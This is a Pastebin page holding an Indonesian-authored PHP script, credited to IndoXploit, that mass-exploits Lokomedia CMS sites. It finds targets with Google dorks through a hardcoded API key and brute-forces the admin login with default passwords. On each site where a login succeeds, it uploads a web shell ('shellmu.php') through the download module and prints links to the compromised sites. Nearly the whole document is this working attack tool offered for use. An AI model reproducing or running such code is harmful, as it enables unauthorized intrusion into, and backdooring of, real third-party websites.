API tools faq
paste
Advertisement
AgusSR

Lokomedia Auto Dorker+Auto Upload Shell by IndoXploit

AgusSR
Apr 21st, 2016
1,446
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
PHP 3.51 KB | None | 0 0
raw download clone embed print report
  1. <html>
  2. <form method="post">
  3. Dork: <input type="text" name="dork" value="inurl:/semua-berita.html" size="50" height="10">
  4. <input type="submit" value="scan">
  5. </form>
  6. </html>
  7. <?php
  8. // IndoXploit
  9. // Mr. Error 404 - shor7cut - tu5b0l3d - UstadCage_48 - sohai sec7or - cyber_taregh - ./MrJ - Mr. Xenophobic - bunglon_ijo - k3c0t - jackwild3r - wisnu404 - magelang6etar - Falcon-G21 - Rieqyns13
  10. class indoxploit {
  11.     public $dork;
  12.     public function google($dork, $page) {
  13.         $kunAPI = "AIzaSyDYG1FME1N7meBZLcywY7VojMHmtUAUIzY";
  14.         $dork = urlencode($dork);
  15.         $url = "http://ajax.googleapis.com/ajax/services/search/web?v=1.0&hl=iw&rsz=8&q={$dork}&key=$kunAPI&start={$page}";
  16.         $output = json_decode($this->http_getx($url, true), true);
  17.         if($output) {
  18.             return $output;
  19.         } else {
  20.             return false;
  21.         }
  22.     }
  23.     public function http_getx($url, $safemode = false) {
  24.         if($safemode === true) sleep(1);
  25.         $im = curl_init($url);
  26.         curl_setopt($im, CURLOPT_RETURNTRANSFER, 1);
  27.         curl_setopt($im, CURLOPT_CONNECTTIMEOUT, 10);
  28.         curl_setopt($im, CURLOPT_FOLLOWLOCATION, 1);
  29.         curl_setopt($im, CURLOPT_HEADER, 0);
  30.         return curl_exec($im);
  31.         curl_close();
  32.     }
  33.     public function buffer() {
  34.         ob_flush();
  35.         flush();
  36.     }
  37.     public function exploit($url,$payload) {
  38.         $ch = curl_init($url);
  39.           curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
  40.           curl_setopt($ch, CURLOPT_POST, true);
  41.           curl_setopt($ch, CURLOPT_COOKIEFILE, 'cookie.txt');
  42.           curl_setopt($ch, CURLOPT_COOKIEJAR, 'cookie.txt');
  43.           curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
  44.           curl_setopt($ch, CURLOPT_POSTFIELDS, $payload);
  45.         $res = curl_exec($ch);
  46.           curl_close($ch);
  47.         return $res;
  48.     }
  49. }
  50. $dorker = new indoxploit;
  51. $dork = $dorker->dork = $_POST['dork'];
  52. if(isset($dork)) {
  53.     $data = $dorker->google($dork, "0");
  54.     $dorker->buffer();
  55.     if($data) {
  56.         foreach($data['responseData']['cursor']['pages'] as $key => $data_page) {
  57.             $data = $dorker->google($dork, $data_page['start']);
  58.             foreach($data['responseData']['results'] as $key => $load_data) {
  59.                 if($_SESSION[$load_data['visibleUrl']]) {
  60.                 } else {
  61.                     $_SESSION[$load_data['visibleUrl']] = "1";
  62.                     $url = "http://".$load_data['visibleUrl']."/";
  63.                     $up = array(
  64.                         "admin" => "admin",
  65.                         "admin" => "123456",
  66.                         "admin" => "admin123456",
  67.                         "admin" => "tolol",
  68.                         "admin" => "administrator",
  69.                         "indoxploit" => "indoxploit",
  70.                         );
  71.                     foreach($up as $user => $pass) {
  72.                         $data1 = array("username" => $user, "password" => $pass,);
  73.                         $anu = $dorker->exploit($url.'/adminweb/cek_login.php', $data1);
  74.                         if(preg_match("/Logout|Administrator/i", $anu)) {
  75.                             $file = "shellmu.php"; // ubah shellmu.php jadi nama file shellmu 1 dir dengan exploit ini
  76.                             $data2 = array("judul" => "indoxploit", "fupload" => "@$file", "upload" => " &nbsp;&nbsp;&nbsp;&nbsp; Simpan &nbsp;&nbsp;&nbsp;&nbsp;");
  77.                             $anu2 = $dorker->exploit($url.'/adminweb/modul/mod_download/aksi_download.php?module=download&act=input', $data2);
  78.                             if(preg_match("/indoxploit/", $anu2)) {
  79.                                 $cek = $dorker->http_getx("$url/files/shellmu.php");
  80.                                 if(preg_match("/Upload|MySQL|SMTP Grabber/i", $cek)) {
  81.                                     echo "<a href='$url/files/shellmu.php' target='_blank'>$url/files/shellmu.php</a><br>";
  82.                                 }
  83.                             }
  84.                         }
  85.                     }
  86.                 $dorker->buffer();
  87.                 }
  88.             }
  89.         }
  90.     $dorker->buffer();
  91.     } else {
  92.         echo "google captcha.";
  93.     }
  94. }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!